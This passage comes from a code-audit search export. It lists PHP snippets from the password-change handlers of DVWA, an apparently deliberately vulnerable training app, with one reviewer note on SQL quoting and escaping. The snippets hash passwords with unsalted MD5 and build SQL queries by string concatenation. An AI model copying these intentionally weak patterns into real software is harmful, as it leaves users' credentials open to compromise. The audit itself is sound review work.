string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"highlight\"><span class=\"line-number\">31:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"' LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">32:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token 
punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token 
string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \n<span class=\"line-number\">34:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> user\n<span class=\"line-number\">35:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">36:</span> \t\t}",
  "line": 31,
  "start": 26,
  "end": 37,
  "severity": "unknown",
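  "note": "Backtick match is SQL identifier quoting, not command execution. Line 27 escapes $pass_new before line 28 hashes it: the MD5 output is hexadecimal and needs no escaping, while escaping first changes the bytes that get hashed for passwords containing characters that are escaped. The UPDATE on line 31 concatenates the return value of dvwaCurrentUser() without escaping; its definition is not in this excerpt, so confirm it cannot carry a quote, or bind both values in a prepared statement."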
 },
 {
  "id": 124,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">57:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">58:</span> \n<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"highlight\"><span class=\"line-number\">60:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token 
punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span 
class=\"line-number\">62:</span> \n<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">65:</span> \t}",
  "line": 60,
  "start": 55,
  "end": 66,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 136,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">65:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">66:</span> \n<span class=\"line-number\">67:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"highlight\"><span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">69:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token 
punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span 
class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">72:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">73:</span> \t}",
  "line": 68,
  "start": 63,
  "end": 74,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 147,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span 
class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 162,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span 
class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t}",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 169,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">18:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span 
